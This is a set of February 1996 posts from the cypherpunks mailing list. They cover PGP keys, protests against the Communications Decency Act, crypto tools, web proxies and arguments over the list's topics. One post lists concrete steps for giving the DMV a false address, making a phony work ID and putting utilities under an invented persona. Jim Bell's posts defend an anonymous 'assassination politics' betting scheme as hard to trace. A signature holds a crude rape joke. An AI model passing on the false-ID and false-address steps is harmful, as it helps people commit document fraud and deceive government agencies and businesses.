2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Thu, 8 Feb 1996 13:11:54 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <v01530509ad3f246f85f3@[204.179.169.87]>
MIME-Version: 1.0
Content-Type: text/plain


>jim bell writes:
>[More Junk]
>
>Look folks, I'm really sick about the debate about Jim's ideas about
>"assassination politics". (My opinion about the idea isn't
>transmittable under the Exon law so I couldn't say anything anyway).
>
>This has gone off into political theory. Could we take it to private
>mail or some such?

I think that it poses serious questions about anonymity and cryptography
and their uses, therefore it is a viable topic.  Just rm it if you don't
want to read about it.

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 8 Feb 1996 10:16:53 +0800
To: cypherpunks@toad.com
Subject: Electronic Funds Clearing House?
Message-ID: <v02120d01ad3efd425926@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Take a look at these guys...

http://www.efunds.com/welcome2.html

Now I know I can't use e-money.com. :-).

Anybody here heard of them?

Cheers,
Bob


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://www.tiac.net/users/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 11:17:11 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage 6 Feb 1996
Message-ID: <01I0Y0B1REJAA0UX5L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  7-FEB-1996 14:51:59.08

COLLEGES WORRY ABOUT NEW LIABILITY FOR INTERNET CONTENT
The recent passage of the telecommunications reform bill has some college
administrators worried over new liability issues for educational
institutions that might unknowingly make "indecent" material available to
minors through their Internet access operations.  In addition, they've
expressed concern over potential First Amendment violations if they censor
the content too heavily.  "We have programs on campus about date rape,
unwanted pregnancy, and reproductive-health options, so I don't see how we'd
tolerate censorship of that kind of information in the electronic format,"
says the head of telecommunications at Carnegie Mellon University.
(Chronicle of Higher Education 9 Feb 96 A23)

----------------------
Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

Technical support is provided by the Office of Information Technology,
University of North Carolina at Chapel Hill.

***************************************************************
EDUPAGE is what you've just finished reading.  (Please note that it's
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage Willie Loman (assuming that your name is Willie Loman;  if it's not,
substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 8 Feb 1996 12:25:08 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Type I capabilities added to mix@zifi.genetics.utah.edu
In-Reply-To: <Pine.LNX.3.91.960207150602.12054S-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.LNX.3.91.960207201411.14765A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


well,

here's is the PGP public key for the lead remailer 
<mix@zifi.genetics.utah.edu> since it would require editing to add the 
key i sent in my previous, PGP signed mesg.

-pjf


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEY6mQAAAEEAMqdj6BCAb95C7KDM7UWTieGdCWVNmI8sKcDdX5JIyBWGo7Y
hKnxF3OgO+sTxjeeabCG8xWHNe9w8CzXPbOBE3soEedvY+FqaRBYdO8a3Eex4nSp
WomnKtcKcBet7G93PErGf4srEwR1OqMRsi+1CbDayNSu6IDU2P69KCmvu47hAAUR
tCpsZWFkIHJlbWFpbGVyIDxtaXhAemlmaS5nZW5ldGljcy51dGFoLmVkdT6JAJUD
BRAxGOraTdCj+UbQAfkBAVu9A/4kPaTN84+giuDkeiqbwTRMGAUQZ3N65hSR6snt
cQp3cvpY30d4i8r3PiBR+5LUAsO/vrrGGyW106X/PHKQpb2lJ5SbcoJ+fMhMcBFc
/UPxkwJGbcc7ftBkrIUNVetPik8PoRTlzgbBSypv97HiApYdZc6fKr2NuLv8OhmG
fdWcEYkAlQMFEDEY6oX+vSgpr7uO4QEBoUMD+wfpS5YhYHfVp37iklOSYhQdzpcl
pefg/RxgroWMWMzLYCeMvcoqlCIEznfYA8fSEPsmVDH22lQvZaLSbXM5WQ1gpZsE
6qR5SicFI9oX5ciVa2M+KgH3sxwS9TDFqcWBSgSnWPHzDT1oUBI/PLI2k/FGN5Hq
rbYH2gPobLez9N9z
=ms21
-----END PGP PUBLIC KEY BLOCK-----




"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 8 Feb 1996 11:47:44 +0800
To: cypherpunks@toad.com
Subject: anti-CDA graphic
Message-ID: <2.2.32.19960207144440.0068abb8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've put Gordon Campbell's anti-CDA graphic up on the CP ftp site, in the incoming directory. File name is nobabies.jpg

Dave Merriman-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sat, 10 Feb 1996 17:51:05 +0800
To: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <199602070848.AAA05915@darkwing.uoregon.edu>
Message-ID: <199602080331.VAA01313@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles <gbroiles@darkwing.uoregon.edu> said:

GB> How about the circle-slash "no" symbol superimposed on the
GB> Constitution?

	Well, many people in this country don't respect, or
appreciate, the Constitution any more - look at all of the complaints
about alleged criminals getting off because of 'technicalities' like
unreasonable searches.  It needs to be something that at least some of
the supporters of the CDA have reverence for - the circle/slash on a
Bible.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.
CDA Bait: Look, I have two daughters who haven't been laid yet.  How
about you rape them right here, instead of my guests?  Gen 19:8




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 8 Feb 1996 04:08:06 +0800
To: cypherpunks@toad.com
Subject: strong cryptography for Java
Message-ID: <Pine.SOL.3.91.960207214024.361H-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



I found today a Java package, implementing some cryptography (MD5, DES, 
RSA and Diffie-Hellman). Seems quite interesting.

It is called JCrypt alpha release 0.1.

The information is on:

http://www.cs.utexas.edu/users/achou/JCrypt/packages.html

Sorry if this has been on this list already.

Jüri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 15:25:19 +0800
To: cypherpunks@toad.com>
Subject: Re: Assassination Politics--isn't it gambling?
Message-ID: <m0tkPbC-00093KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:00 PM 2/6/96 PST, banelaw@med.com wrote:
>Jim: as to "Assassination Politics."  Isn't the structure you describe
>gambling?  Placing money on a prediction, with the correct predictor
>winning? 

I guess that depends on the laws, doesn't it? <G>   Seriously, though, since 
all the participants are anonymous, and it can all be done from overseas...

Somehow, though, I think politicians will take little solace from knowing 
that they are protected from death only by laws against gambling.

> And if so, isn't it illegal if done over the wires, i.e., federal
>commerce?  I'm not looking for a way to declare your scheme illegal, I'm
>just pointing out that there are other angles, especially if done over the
>wires.

I'd sure like to read a serious legal analysis of all this.  Maybe all the 
lawyers are too terrified to respond.


> I guess you could move the structure off shore--pity the poor country
>hosting such an entity!  If you were at all succesfull, the server accepting
>digital cash would be moving from place to place--remember pirate radio?

Presumably, the digital cash could be encrypted with the organization's 
private key, and published (anonymously) on a USENET area, in a way which is 
untraceable and unidentifiable.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen.   Something.......Wonderful!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRlnY/qHVDBboB2dAQHJcQP/T8u6c5K3Idb5K8/ztBJWSqTQBPmvMlpR
y4GlRgOyIn11jnMX60p7ffselQwSF8mxM3BJv4O2ODr/KWwACeQoK9svWW30xSyF
0eSuFzHvOfrZLW3xvpTo1mMoxRCtYeUQZLZGLvU2G99P6GeWCPRhWbFfTQ1Q6aen
yiEOvB/DfUs=
=Aj2b
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomservo@access.digex.net (Scott Fabbri)
Date: Thu, 8 Feb 1996 12:19:50 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <v02130501ad3f18f345de@[206.161.73.133]>
MIME-Version: 1.0
Content-Type: text/plain


>At 01:48 PM 2/4/96 EST, Greg Broiles wrote:

>How about the circle-slash "no" symbol superimposed on the Constitution?

Hmm, I kind of went the other way. I have a gif of a baby carriage in the
standard red circle and slash. Anyone who wants it, feel free to use it.
Resize it, reshape it, share it with your friends. (I feel much better
about buying all that clip art now.)

It's at:

     http://www.access.digex.net/~tomservo/gif/no_kids.gif

Other suggestions? Feel free to e-mail me. I'll dig up what I can. (Next
up: the "PGP-friendly" logo. . .)

Scott

--
Scott Fabbri                                     tomservo@access.digex.net
Later. Later. I'm watching hockey.               Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 10 Feb 1996 03:00:09 +0800
To: cypherpunks@toad.com
Subject: E-Mail security
Message-ID: <960207222006.20217dac@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


> The Sun Observer -- "An Independent Journal Devoted to the 
> Sun and Compatible Markets" -- ran an article in the Feb 96
> issue entitled "New technology eliminates need for keys to
> encrypt e-mail messages".

Well I consider PGP to be "Good Enough" (C - quantum economics). And
with the new "enclyptor", encrypt/decrypt from Windoze is just
a clipboard away. Seems like there are two kinds of crypto/firewalls/???
these days: those that are like French cars with beautiful GUIs and a
4 cyl engine, and the American ones with great drivetrains and terrible
coachwork (why is purple so popular ?). And then there was the Facel-Vega 
HK-500...
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Thu, 8 Feb 1996 12:37:13 +0800
To: cypherpunks@toad.com
Subject: Re: Dealing with Credit Reporting Agencies...
Message-ID: <m0tkMze-004YCVC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:31 AM 2/5/96 -0600, Karl Ike wrote:
>Attila: I'm not in the business of running or hiding. I'm just an average,
>everyday working guy that doesn't like credit reporting agencies, what they
>stand for or what they do for money. I didn't say that I was going to do
>this. I just had the idea! I don't have the knowledge or the money to spend.
>That doesn't mean that there is someone out there that would jump at the idea.
>
>I just don't like the idea that these assholes know more about me than my
>mother and sell my private and personal information to anyone for big bucks.
>My credit is fine, just ask my banker or better yet, my mom.
>
>I am assumming that you know far more people on the internet since I have
>only been on for a month and have done three e-mail. I'm just suggesting to
>get the idea out and someone will take the ball and run. Yes, they will be a
>hunted man, but not a US citizen. Someone out there with a laptop and a
>cellular, living on a cruise ship, just may enjoy the idea.
>
>Just me, Karl

Well Karl, It seems I missed your idea/solution in this post, however, some of 
us figured this out some years ago... I begin a campaign almost 10 years ago 
of feeding the computers false information about myself. I never use the Social
Insecurity Number assigned to me... I don't even give it to the Bank. This makes
for some rather dicey situations. I rarely use my real name or give out my real
phone number. At this point in my life... I have *NO* credit history. I currently 
have *NO* bank account. My goal is to be completely invisible to the system.
Yes I have had a few glitches in this plan from time to time... but I continue to 
work on it.

I just have never felt warm and fuzzy knowing that any government agency,
business, or whoever can get my personal information off a computer could come
knock on my door some dark night. If you're interested in fortifying your privacy,
I can give you a few pointers.

1.) Go to your local DMV and inform them you've had a change of address. I
     selected a high rise apartment building with 15 floors and selected an address
     on a non-existant 23rd floor. Getting your Driver's License address changed
     should cost less than $10.00.

2.) Go find a company like "Mail Boxes Etc." and rent a mailbox. The cost is
     nominal compared to the added privacy and security. The distinction between
     a mailbox and a Post Office Box is with a mailbox you have an actual street
     address. You can receive deliveries from UPS and Federal Express at a 
     mailbox. You can't at a P.O. Box.

3.) This part requires some skill... befriending a graphic artist is a good idea for 
     this one. But what you need is a phony work identification.  Pick a name! A 
     couple of "Pass Port Photos" and some lamination and you're good to go.

4.) Take your new persona down to your local utility companies and get the serv-
     ice switched to the name of your new persona. Even get your phone switched
     and have the number non-published. You'll be pleasantly surprised from now
     on, everytime your phone rings, it will be someone you really want to talk to.

5.) Go down to your local Post Office and file a change of address form. Use the
     address of your mailbox. Remember, most companies that provide Mailbox
     service, will need to see your drivers license... which of course now has a
     non-existant address on it.

You can take this as far as you want... Just doing these 5 things will give you a
sense of comfort and security you've probably not had in a long time. How does
this fit into cyperpunks and encryption? The philosophy is the same! What good
is it encrypting your messages to ensure your privacy when everything else is
exposed! It's a lot like an Ostrich burying his head in the sand to hide, but leaving
all his good parts exposed!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF IRChat)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRlexoSAJOVFNaChAQFBCQf8Drm04x2YT5gZb8cklwep1eBVKxOMyVzn
/ZN3Tk+lKT05CAT0TCmHm+8oztqxWhgjMklYT228C5u4zvaF8ZrYvLxMp7RQPHvK
D2fSKdMGMs+pPvJxPUC5UXssoIsBS0W+i4dO5jDIj/MkXM4JFHsDHvFqr9Q7FqwE
Xr75lHjiNP4Gcv06WkVpJewJMaflP5zcrSam577/fbbCkYM6e4nhQPGdqdi83txM
hzvCs8cHalPa9UJGuSbIZObe1fAUkQMsVqEomXe5HuBzukJigwdqj4IK9SJixTVx
m0Fxf/W74j4lS1TXpqjCQoSD4EPRAleCYR6SFbqV/p0/cMYqv6kErA==
=4HYS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 15:41:20 +0800
To: "E. ALLEN SMITH" <wlkngowl@unix.asb.com
Subject: Re: Electronic Grille Cipher?
Message-ID: <m0tkPzD-000910C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:16 PM 2/6/96 EDT, E. ALLEN SMITH wrote:

>	I had a similar idea a bit back, and Lewis/Futplex kindly referred me
>to some parts of the Archives discussing it. However, the main objection to
>this idea was that the cops would just do a search warrant for the second group
>of information. My solution to this is to have quite a few groups of
>information, which would admittedly make the spacing problem a bit hard.
>The following might be an example for someone of such a scheme:
>
[comparatively innocent stuff deleted]

>G. Your plans to violently overthrow the government (don't give).

Hmmmm...   That's odd.  I spam this stuff on USENET and FIDOnet <GGG>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Feb 1996 13:34:26 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <ad3ec6f00e02100450d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



About all the proposed symbols and logos and ribbons....

I realize I often come across as a naysayer against collective efforts to
design logos, arm patches, flags, and other such tribal insignias...(:-}).

Logos and symbols have their place. The "Big Brother Inside" logo is a good
joke.

But mainly I think that we underestimate the value of _words_. Instead of
some cutesy logo, such as a red rose being run over by the "Valdez," a logo
which many people would not understand and would not be interested in
looking up an explanation for, why not simply include a couple of English
sentances _describing_ why the page has been censored, why adult material
has been removed, etc.? (This is the norm today, and I'm glad of it. I
don't relish looking at a Web page filled with inscrutably clever icons and
logos.)

Graphical icons are great, and worked well until writing was invented.


--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Edwards <tedwards@wam.umd.edu>
Date: Sat, 10 Feb 1996 04:32:26 +0800
To: cypherpunks@toad.com
Subject: Rally against Internet Censorship in D.C. this Saturday!
Message-ID: <Pine.SOL.3.91.960207225554.21668I-100000@exp3.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



[ObCrypto: Crypto may be the only answer if the ACLU loses its court case...]

      ======================================================
      =  RALLY AGAINST THE COMMUNICATIONS DECENCY ACT!!!!  =
      =							   =
      =         12:00 Noon Saturday Feb. 10, 1996          =
      =          Lafeyette Park, Washington, D.C.          =
      =             Next to the WHITE HOUSE                =
      =                                                    =
      ======================================================

      Congress has passed laws calling for sweeping censorship
      of computer networks, and the President is ready to
      sign it.  Are YOU just going to sit back and take it?

      Join hundreds of D.C. Internet users in rallying against
      the Communications Decency Act and Internet Censorship.
	
      Find out about the ACLU court case to challenge the CDA.

      ...And tell the Congress to repeal the CDA!!!!!!!!!

	Confirmed Speakers include:

	   o  Jonathan Wallace (A plaintiff in the ACLU court case
	        against the CDA, and Editor of The Ethical Spectacle)
	
	   o  Jonah Seiger (Policy Analyst, The Center for Democracy
	      	and Technology)

	   o  Kaz Vorpal (Owner of UltaPlex, a local Internet service
		provider)

	   o  Mark Mangan (co-author of "Sex, Laws, and Cyberspace")

	   o  William Winter (Communications Director, National
	        Libertarian Party)
	 
	   o  Plus open mike time to make your own views heard!

	Bring signs, banners, and tell your friends!

	For more information, send email to tedwards@wam.umd.edu.
 
"With this act of Congress, the very same materials which are legally
available today in book stores and libraries would be illegal if posted on
World Wide Web sites or usenet newsgroups. If signed by President Clinton
as expected, this bill will transform the Internet overnight from the
freest communications medium to the most heavily regulated medium in the
United States." 

	- The Center for Democracy and Technology Policy Post 2:5.


	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Thu, 8 Feb 1996 22:09:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <v01530511ad3f4d2716ee@[204.179.169.87]>
MIME-Version: 1.0
Content-Type: text/plain


>About all the proposed symbols and logos and ribbons....
>
>I realize I often come across as a naysayer against collective efforts to
>design logos, arm patches, flags, and other such tribal insignias...(:-}).
>
>Logos and symbols have their place. The "Big Brother Inside" logo is a good
>joke.
>
>But mainly I think that we underestimate the value of _words_. Instead of
>some cutesy logo, such as a red rose being run over by the "Valdez," a logo
>which many people would not understand and would not be interested in
>looking up an explanation for, why not simply include a couple of English
>sentances _describing_ why the page has been censored, why adult material
>has been removed, etc.? (This is the norm today, and I'm glad of it. I
>don't relish looking at a Web page filled with inscrutably clever icons and
>logos.)
>
>Graphical icons are great, and worked well until writing was invented.

I agree that words have thier place, however, combined with easily
recognizable, uniformly similar graphical symbols, they become even more
powerful.  That's one of the greatest strengths of the web, is it not?


lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 8 Feb 1996 15:44:35 +0800
To: support@netcom.com
Subject: Re: cipherpunk mail at Netcom.com
Message-ID: <199602080708.XAA26619@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 2/4/96 -0800, Norman Hardy wrote:
>The list of addressees is made from the "From" fields that include
>"netcom.com" in CP mail that appeared on the CP list Tuesday and Wednesday
>last week. I have received no CP mail since then. Have you?

Now that dam seems to have broken (I have received over 250 messages in the
last four hours), perhaps I can ask, "What Happened?".

I, along with Norm and Lucky received no Cypherpunks traffic for about a
week from Februrary 1 to February 7.  During this period, we could not get
response from majordomo@toad.com.  I asked a friend in the east to ping
toad.com and request "help" from majordomo@toad.com.  He did and reported
no problems with either test.

I have sent a request to Netcom support for help with this problem, but
their automatic responder says the have a 2 week backlog of email! :-(. 
Perhaps I will get some information from them in a few weeks.

I have two questions: (1) Did people who are not at netcom.com or
ix.netcom.com experience this outage?  (2) Did people who ARE at netcom.com
or ix.netcom.com receive the normal level of traffic during this period? 
Please respond by private email and I will summarize for the list.

I my more paranoid moments, I wonder if this a practice denial of service
attack.  In any case, perhaps this post will explain some of the strange
posts we have been sending to cypherpunks this last week.  My appologies
for the noise.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 8 Feb 1996 21:32:05 +0800
To: cypherpunks@toad.com
Subject: Re: personal web proxy?
Message-ID: <v02130500ad3f3af6fb53@[199.227.1.154]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone know whether there's a freely available web proxy available
>anywhere? Even a "personal" one somewhere on my ISP's UNIX box would be a
>simple way to beat superficial logging/resolution of my static IP.
>Something like the Nutscapify or Canadianizer proxies, minus all the
>blinking and "hoser, eh?" stuff.

The CERN webserver can be configured to run in proxy mode.  It can also
cache requests so that if multiple people are using it (better from the
hide me point of view), response time is actually better for pages that
more of them are reading.

There are several others, but I've only personally run CERN.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Thu, 8 Feb 1996 17:11:56 +0800
To: perry@piermont.com
Subject: Re: cypherpunks press
In-Reply-To: <199602022111.QAA12320@jekyll.piermont.com>
Message-ID: <199602080846.DAA30376@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Could someone please explain to me why Mitnick is a cypherpunk issue?
> Myself, I have neither sympathy nor lack of sympathy for the
> Markoff-Shimomura "pr extravaganza", see no "cypherpunk" opinion on
> the subject, and don't see any reason we should, as a group, discuss
> or care about the topic.

I'm sure glad that you don't run this list, Perry, but it seems that you
think you do.  I, for one, get rather tired of your seemingly endless
attempts at censoring what *you* think is and isn't relevent to the list. 
I see it as a cypherpunk issue, insofar as it deals with the issues of
tracking down crackers, but I don't expect you to make the connection,
since I guess the word "encryption" didn't figure prominently in the post 
and the connection isn't immediately obvious to the most casual observer, 
causing you to foam at the mouth and gush all over the list about "the 
relevence to the cypherpunks list" nonsense.  Can someone please explain 
to me why *your* posts whining about the lack of relevence of certain 
posts are relevent?  Why don't you take your own advice?

I've got a better idea -- why don't you start your own list?  That way,
you can moderate to your heart's content and I don't have to see any more
whining messages from you about what is and isn't "relevent". 

Why don't you go and write some code?  Put those busy fingers to better
use than to try and write pithy flames in an attempt to sound "cool" and
call attention to yourself as the self-appointed censor of cypherpynks. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Thu, 8 Feb 1996 18:35:43 +0800
To: cypherpunks@toad.com
Subject: Re: POTP gets good press
In-Reply-To: <199602080009.RAA16512@taussky.cs.colorado.edu>
Message-ID: <ML-2.0.823773937.9124.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


bryce@colorado.edu sez:

> "Synchronized Random Key Generation", which shows a single
> sender and multiple recipients transmitting securely
> *without* having to do any key management!  Yee haw!

You mean you don't have this capability? Gee, I've had this for months,
ever since the mother ship^H^H^H^Hmy mother gave me the proprietary program.

*sigh* Cypherpunks teach. I think we'd better brace for this, cuz most of
the important code is already written. (PGP 3.0 and PGP stealth people, this
doesn't apply, and definately any end-to-end stuff is needed)

Unfortunately, you can't set up a CGI counter to tick off the number of time
encryption saved your data, not to mention your butt, but it would sure make
good PR if you could.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 01:56:02 +0800
To: Don <don@cs.byu.edu>
Subject: Re: cypherpunks press
Message-ID: <v01530514ad3f8a828149@[204.179.169.87]>
MIME-Version: 1.0
Content-Type: text/plain


>ecarp@netcom.com sez:
<rm for brevity>

>My feeling is that Mitnick getting past security, and Mitnick not having
>to decrypt at every stage, and stuff like that is good material, but these
>topics generally have big ol' love handles attached to them. Describing
>people's hot tub parties, for example, is not exactly cypherpunk material.

<more snippin'>

>I am imagine many people use (and I am headed this way) nntp.hks.net merely
>to avoid large boring non crypto/political threads. Not everyone has this
>capability, and now some of them have left because of the S/N. I'm talking
>about real cryptographers, not weekend warriors like, well, ok I'm more like
>a yearend warrior.On the other hand, Alice and others haven't posted lately,
>so perhaps the noise is just the fill-the-vacuum pheonominon.
>
>> Why don't you go and write some code?  Put those busy fingers to better
>
>Perhaps he is. I am. Are you?

I am too, but the other half of my major is philosophy.  I can't help BSing
about the social issues too.....which seems to be common on the list.
Perhaps there is a compromise since there seem to be interests on the part
of both parties?  Like cypherpunks-tech@toad,com.  Any words?

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
